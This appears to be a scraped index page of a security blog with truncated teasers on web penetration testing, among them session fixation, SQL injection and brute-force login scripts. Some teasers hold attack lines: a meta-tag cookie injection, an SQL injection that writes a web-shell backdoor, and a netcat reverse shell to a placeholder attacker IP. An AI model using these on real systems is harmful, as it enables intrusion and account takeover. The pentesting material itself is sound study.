Set cookie by meta tag
<meta http-equiv="Set-Cookie" content="_session_id=0123456789; EXPIRES=Monday, 22-FEB-20 01:00:00 GMT; DOMAIN=localhost; PATH=/;" />
View ArticleSession fixation
https://www.youtube.com/watch?v=4gVSEU92xI4 https://www.youtube.com/watch?v=Eu70WqFBt2I https://www.owasp.org/index.php/Session_fixation https://www.youtube.com/watch?v=eUbtW0Z0W1g
View ArticleAccount lockout
https://www.youtube.com/watch?v=hweQ5oW6ImA https://www.youtube.com/watch?v=oVH0h14qG1k#t=176.742441
View Article#note – SQL Injection Cheat Sheet
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
View ArticleClik here to view.
Protect FileUpload Against Malicious File
Problem Very often during file validation we are check extension and size of file. We want to be sure that user will not be able to upload executable file(php, exe and other). On the other hand we...
View Article#note – python version
http://askubuntu.com/questions/320996/make-default-python-symbolic-link-to-link-to-python3
View ArticleReview webpage comments
https://www.owasp.org/index.php/Review_webpage_comments_and_metadata_for_information_leakage_(OTG-INFO-005) It is very common, and even recommended, for programmers to include detailed comments and...
View ArticleClik here to view.
Sql injection – upload backdoor- mysql
-- conditions -- we know the application directory -- we know sql injection vulnerability in the app SELECT _utf8 '<form method="post"><input name="cmd"/><input type="button"...
View ArticleBrute Force Login Attacks
simple python script # python 3.4 import urllib.request import urllib.parse loginFilePath = "login.txt" passFilePath = "pass.txt" # passFilePath = "../../_data/_pass/john.txt" # passFilePath =...
View ArticleTest HTTP Methods
https://www.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006) # python 3.4 import urllib.request import urllib.parse http_methods = ['HEAD', 'GET', 'POST', 'OPTIONS', 'TRACE'] page_url =...
View ArticleTest RIA cross domain policy
https://www.owasp.org/index.php/Test_RIA_cross_domain_policy_(OTG-CONFIG-008) # python 3.4 import urllib.request import urllib.parse ria_meta_file = ['crossdomain.xml', 'clientaccesspolicy.xml']...
View ArticlePre-engagement Pentest Checklist for Web Applications Assessments
base on https://pentestlab.blog/2015/02/01/pre-engagement-pentest-checklist-for-web-applications-assessments/ http://www.pentest-standard.org/index.php/Pre-engagement Pre-engagement Pentest Checklist...
View ArticleCustom dictionary file based on the content of the website
This script will generate file with unique words from target website. url.txt http://company-test.com/about-as http://company-test.com/company http://company-test.com/stuff tool.py # python 3.4 import...
View ArticleCommand Execution
On attacker machine sudo nc -vv -l -p 8081 Listening on [0.0.0.0] (family 0, port 8081) On victim machine nc -e /bin/sh IP_OF_ATTACKER_IP 8081 now check attacker machine if you see something like...
View ArticleUbuntu postgresql from scratch
Ubuntu 14 postgresql installation sudo apt-get update sudo apt-get install postgresql postgresql-contrib Go to console sudo -i -u postgres psql Example db with one table CREATE DATABASE btbw; \connect...
View ArticleHex url coder
not perfect, draft import binascii def hex_url(_url): protocol = '' filter = ['?', '=', "/"] if _url.startswith('http://'): protocol = 'http://' _url = _url.replace(protocol, "") if...
View ArticleTwo step registration. Problem with username and enumeration.
Problem If during registration, system validates username unique and informs about that by some type of validation message, you can treat this as Data Leak. Potential Attacker can use this...
View Article